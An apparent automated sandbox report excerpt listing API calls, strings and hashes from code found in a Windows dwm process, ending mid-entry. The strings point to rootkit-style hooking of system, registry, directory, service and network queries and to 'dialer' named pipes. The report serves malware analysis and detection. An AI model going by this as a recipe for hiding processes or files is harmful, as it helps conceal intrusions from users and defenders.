Part of subcall function 000001C6CEF11650: GetProcessHeap.KERNEL32 ref: 000001C6CEF1165B
Part of subcall function 000001C6CEF11650: HeapAlloc.KERNEL32 ref: 000001C6CEF1166A
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF116DA
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11707
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11721
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11741
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF1175C
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1177C
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11797
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117B7
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF117D2
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117F2

Sleep.KERNEL32 ref: 000001C6CEF11C43
SleepEx.KERNELBASE ref: 000001C6CEF11C49

Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF1180D
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1182D
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11848
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11868
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11883
Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF118A3
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF118BE
Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF118C8

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: fd78d7c6a5adf4b60a55e09ff287725481ac5a39e1101aff71a959d5f1980cdc
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 3E31EDB7280A4991FB509FB6DE41BEE23B4AB44BD0F145021DEED876D6EF25C860C258

Function 000001C6CEF42908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001C6CEF429AA

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: cc52f35e6bf302ebf835e16cb1959fd63dcfc8ec92895573d399674221a92ee8
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 5B61213274125187FB68CF25DA40BADB3B5FB44BA4F148032DEA907785DB38E892C708

Non-executed Functions

Function 000001C6CEF12CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001C6CEF12D80
lstrlenW.KERNEL32 ref: 000001C6CEF12FBA

Part of subcall function 000001C6CEF11A14: OpenProcess.KERNEL32 ref: 000001C6CEF11A3A
Part of subcall function 000001C6CEF11A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001C6CEF11A58
Part of subcall function 000001C6CEF11A14: PathFindFileNameW.SHLWAPI ref: 000001C6CEF11A67
Part of subcall function 000001C6CEF11A14: lstrlenW.KERNEL32 ref: 000001C6CEF11A73
Part of subcall function 000001C6CEF11A14: StrCpyW.SHLWAPI ref: 000001C6CEF11A86
Part of subcall function 000001C6CEF11A14: CloseHandle.KERNEL32 ref: 000001C6CEF11A94

GetProcAddress.KERNEL32 ref: 000001C6CEF12D95

Part of subcall function 000001C6CEF11554: StrCmpIW.SHLWAPI ref: 000001C6CEF11585

Part of subcall function 000001C6CEF13930: StrCmpNIW.SHLWAPI ref: 000001C6CEF13948

StrCmpNIW.SHLWAPI ref: 000001C6CEF12DD8
lstrlenW.KERNEL32 ref: 000001C6CEF12F00

Strings

NtQueryObject, xrefs: 000001C6CEF12D8B
ntdll.dll, xrefs: 000001C6CEF12D79
\Device\Nsi, xrefs: 000001C6CEF12DCB

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: a373cb445be8c8da9b20be2bd855ca446f5f225dcf763266fe885d2703d759b8
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: F9B1DFB2251A9882FB698FA5DC54BE973B4F784B88F14501AEEA943794EF74CC40D344

Function 000001C6CEF17E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001C6CEF17E8C
RtlCaptureContext.NTDLL ref: 000001C6CEF17EB9
RtlLookupFunctionEntry.NTDLL ref: 000001C6CEF17ED3
RtlVirtualUnwind.NTDLL ref: 000001C6CEF17F14
IsDebuggerPresent.KERNEL32 ref: 000001C6CEF17F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C6CEF17F89
UnhandledExceptionFilter.KERNEL32 ref: 000001C6CEF17F94

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: fe592494eab8b3db047633efff28ee84d3d7d6afdf4cc59d54558a04c8d8edd5
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: AA315DB2245B8586FB648F60E840BEE73B0F795744F44442ADA9D47B98EF78C648C714

Function 000001C6CEF1B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001C6CEF1B585
RtlLookupFunctionEntry.NTDLL ref: 000001C6CEF1B59D
RtlVirtualUnwind.NTDLL ref: 000001C6CEF1B5D8
IsDebuggerPresent.KERNEL32 ref: 000001C6CEF1B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C6CEF1B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001C6CEF1B626

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: e0819e9e18dbf45100613067fb1abab242902e2ee4b9e02f9a5878c19a1ccfd2
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 4C316972244B8486EB208F64E844BDA73B4F798794F500126EAAD43BA8DF38C545CB04

Function 000001C6CEF1FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001C6CEF1FF67
WriteFile.KERNEL32 ref: 000001C6CEF2021E
WriteFile.KERNEL32 ref: 000001C6CEF20270
GetLastError.KERNEL32 ref: 000001C6CEF20372
GetLastError.KERNEL32 ref: 000001C6CEF203D2

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: f1027aabbbb33948f8b25775314fbd2107396455a5f0962c38ea0a62f326a2f9
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 04E1EF73B44AC09AF700CFA4D888ADD7BB1F355788F548116EEAA57B99DB38C816C704

Function 000001C6CEF112C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C6CEF11326
GetProcessHeap.KERNEL32 ref: 000001C6CEF11334
HeapAlloc.KERNEL32 ref: 000001C6CEF11345
RegEnumValueW.ADVAPI32 ref: 000001C6CEF113A1

Part of subcall function 000001C6CEF11554: StrCmpIW.SHLWAPI ref: 000001C6CEF11585

GetProcessHeap.KERNEL32 ref: 000001C6CEF113E9
HeapAlloc.KERNEL32 ref: 000001C6CEF113F7
GetProcessHeap.KERNEL32 ref: 000001C6CEF1141B
HeapFree.KERNEL32 ref: 000001C6CEF11429
lstrlenW.KERNEL32 ref: 000001C6CEF11432
GetProcessHeap.KERNEL32 ref: 000001C6CEF11440
HeapAlloc.KERNEL32 ref: 000001C6CEF1144E
StrCpyW.SHLWAPI ref: 000001C6CEF11470
GetProcessHeap.KERNEL32 ref: 000001C6CEF11485
HeapFree.KERNEL32 ref: 000001C6CEF11493

Strings

d, xrefs: 000001C6CEF11365

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 23013508cf5771263fdd12a3f0955e1cfe1116331695a3f4802a505f8f0bd159
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 56518DB2645B85D3FB14CFA2E948B9AB3B1F799F80F048124DAA907B14DF78C056CB04

Function 000001C6CEF11EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001C6CEF11EBF

Part of subcall function 000001C6CEF12174: GetModuleHandleA.KERNEL32 ref: 000001C6CEF1218C
Part of subcall function 000001C6CEF12174: GetProcAddress.KERNEL32 ref: 000001C6CEF1219D

Part of subcall function 000001C6CEF15C10: GetCurrentThreadId.KERNEL32 ref: 000001C6CEF15C4B

Strings

NtEnumerateKey, xrefs: 000001C6CEF11F59
sechost.dll, xrefs: 000001C6CEF11FD9
advapi32.dll, xrefs: 000001C6CEF11F97, 000001C6CEF11FB8
NtQueryDirectoryFileEx, xrefs: 000001C6CEF11F3C
ntdll.dll, xrefs: 000001C6CEF11ECD
NtQueryDirectoryFile, xrefs: 000001C6CEF11F1F
NtDeviceIoControlFile, xrefs: 000001C6CEF11FF6
EnumServicesStatusExW, xrefs: 000001C6CEF11FB1, 000001C6CEF11FD2
NtEnumerateValueKey, xrefs: 000001C6CEF11F76
NtResumeThread, xrefs: 000001C6CEF11F02
EnumServiceGroupW, xrefs: 000001C6CEF11F90
NtQuerySystemInformation, xrefs: 000001C6CEF11EE5

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 84fa439c43bd5f8927ae65dd029de25ae90ea88c709bcec19299b8954eb4d115
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: F33192B42C198EA0FB09EFE5EC5AED43331FB64344F915413A5B916166AF38C249D398

Function 000001C6CEF123F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001C6CEF12405
GetCurrentProcessId.KERNEL32 ref: 000001C6CEF1240F

Part of subcall function 000001C6CEF119AC: OpenProcess.KERNEL32 ref: 000001C6CEF119CA
Part of subcall function 000001C6CEF119AC: IsWow64Process.KERNEL32 ref: 000001C6CEF119E0
Part of subcall function 000001C6CEF119AC: CloseHandle.KERNEL32 ref: 000001C6CEF119FB

CreateFileW.KERNEL32 ref: 000001C6CEF12468
WriteFile.KERNEL32 ref: 000001C6CEF12490
ReadFile.KERNEL32 ref: 000001C6CEF124AF
CloseHandle.KERNEL32 ref: 000001C6CEF124B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001C6CEF1243F
\\.\pipe\dialerchildproc64, xrefs: 000001C6CEF12438

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 61b157c2be016797b51069af18cd7c6b0ef80f2c6d19b4743f106360da3e87b7
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: A7218376654B85C3F710CB64F808B9973B0F788BA4F504215DAA906BA8CF7CC149CF04

Function 000001C6CEF1104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C6CEF110AB
RegEnumValueW.ADVAPI32 ref: 000001C6CEF1110E
GetProcessHeap.KERNEL32 ref: 000001C6CEF11155
HeapAlloc.KERNEL32 ref: 000001C6CEF11163
GetProcessHeap.KERNEL32 ref: 000001C6CEF11187
HeapFree.KERNEL32 ref: 000001C6CEF11195

Strings

d, xrefs: 000001C6CEF110CE

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 09c1b36897fdb5057a155b341a75f2ed4a05c06e4a0b5fa0321ce3e2c9e72505
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: AC415C73654B8496E7648F62E844BDAB7B5F388B84F008129DBD907A54DF38D564CB04

Function 000001C6CEF469F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C6CEF46A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001C6CEF46A6A
_RTC_Initialize.LIBCMT ref: 000001C6CEF46A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C6CEF46ABE
__scrt_release_startup_lock.LIBCMT ref: 000001C6CEF46AE9

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: eec606192f897ef0c8d4aeaaebe731d112bd7a3f1457a02859a8867d61895c2f
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: F181FF3178064186FB64AB65AE40FDD22F0EB95780F56802BEAF5437D2EB38C985C708

Function 000001C6CEEE69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C6CEEE6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001C6CEEE6A6A
_RTC_Initialize.LIBCMT ref: 000001C6CEEE6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C6CEEE6ABE
__scrt_release_startup_lock.LIBCMT ref: 000001C6CEEE6AE9

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 153d35874351d35213f3ecd805990f07b28174c853a0856c0c23b3b89244d9cb
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9F81B031B90E4287FB54AB66AC42FE962F0E74D7C0F5440259AC947796EB38CC47C788

Function 000001C6CEF175F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C6CEF17618
__scrt_acquire_startup_lock.LIBCMT ref: 000001C6CEF1766A
_RTC_Initialize.LIBCMT ref: 000001C6CEF17698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C6CEF176BE
__scrt_release_startup_lock.LIBCMT ref: 000001C6CEF176E9

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 989f6fb629c89564725181cbbcd0c45adafe132ae91089c32857ccd97c1bdfbb
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9D81F2B0B8438986FB54ABE99C41FD922F0AB97B80F6480159AFD477D6DF38C941C718

Function 000001C6CEF19804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001C6CEF19889
GetLastError.KERNEL32 ref: 000001C6CEF19897
LoadLibraryExW.KERNEL32 ref: 000001C6CEF198C1
FreeLibrary.KERNEL32 ref: 000001C6CEF19907
GetProcAddress.KERNEL32 ref: 000001C6CEF19913

Strings

api-ms-, xrefs: 000001C6CEF198A9

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: eeb5cff59d26c32003fe501f4b803576c2cab7f7f7981c682b02dff83c93a369
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 5E31C3B1342A8491FF16DB56AC00FD963B4BB48BA4F991529EDBD0B384EF38C145C348

Function 000001C6CEF21B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001C6CEF21BCD
GetLastError.KERNEL32 ref: 000001C6CEF21BD9
CloseHandle.KERNEL32 ref: 000001C6CEF21BF1
CreateFileW.KERNEL32 ref: 000001C6CEF21C1C
WriteConsoleW.KERNEL32 ref: 000001C6CEF21C3B

Strings

CONOUT$, xrefs: 000001C6CEF21BFD

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 6ed4381fd626ded7b5ba8bf33f246b5eccc68527b454d27e2806e41128e31580
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 5E119D32754B9086F7508B52EC58B9972B0F3A8FE4F100224EAAD87794DF78C914C748

Function 000001C6CEF130B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C6CEF130D7
HeapAlloc.KERNEL32 ref: 000001C6CEF130EA
StrCmpNIW.SHLWAPI ref: 000001C6CEF1316B
GetProcessHeap.KERNEL32 ref: 000001C6CEF131D1
HeapFree.KERNEL32 ref: 000001C6CEF131DF

Strings

dialer, xrefs: 000001C6CEF13164

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: ebc1bbf581b45de122cafe30d1e99934436c65057704cc0c36b7e959c953cf03
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 4031C272B42B99C2FB15CF96AC04AE963B0FB54B84F0980209ED817B55EF78D4A1C708

Function 000001C6CEF11A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001C6CEF11A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001C6CEF11A58
PathFindFileNameW.SHLWAPI ref: 000001C6CEF11A67
lstrlenW.KERNEL32 ref: 000001C6CEF11A73
StrCpyW.SHLWAPI ref: 000001C6CEF11A86
CloseHandle.KERNEL32 ref: 000001C6CEF11A94

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: e4e5bba7ac7f2c9ed894cdc5bf80ffcd71b3f9adc8b971615d7f4cf3d8faf93f
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: B6018071741A8696FB14DB52A858B9963B1F798FC0F488035CEE983754DF7CC985C304

Function 000001C6CEF137AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001C6CEF137C8
GetCurrentProcess.KERNEL32 ref: 000001C6CEF137D6
VirtualProtectEx.KERNEL32 ref: 000001C6CEF137F8
GetCurrentProcess.KERNEL32 ref: 000001C6CEF13819
VirtualProtectEx.KERNEL32 ref: 000001C6CEF1383A
TerminateThread.KERNEL32 ref: 000001C6CEF13849

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 43faba7026b3e706a1f6197789c4f0c1e9b80fc606f1a8a67a5bf5cb31290ad7
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 171180B574278582FB249B61EC0DB9A63B0FBA8B95F040429CEA90B754EF7CC108C718

Function 000001C6CEF190D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C6CEF19103
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C6CEF19198
RtlUnwindEx.NTDLL ref: 000001C6CEF191E7

Strings

csm, xrefs: 000001C6CEF1917E
f, xrefs: 000001C6CEF19116

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 30a97c8e26820279ef6e38b49ada41bcfc43547b8a5eaac171c6c022680db66e
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: B85127B27516848AFB18CF95EC48F9937B5F354B88F109120DEAA13788DB75CC81C789

Function 000001C6CEF11AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001C6CEF11AD8
StrCmpNIW.SHLWAPI ref: 000001C6CEF11AF2
lstrlenW.KERNEL32 ref: 000001C6CEF11B01
StrCpyW.SHLWAPI ref: 000001C6CEF11B16

Strings

\\?\, xrefs: 000001C6CEF11AE6

Memory Dump Source

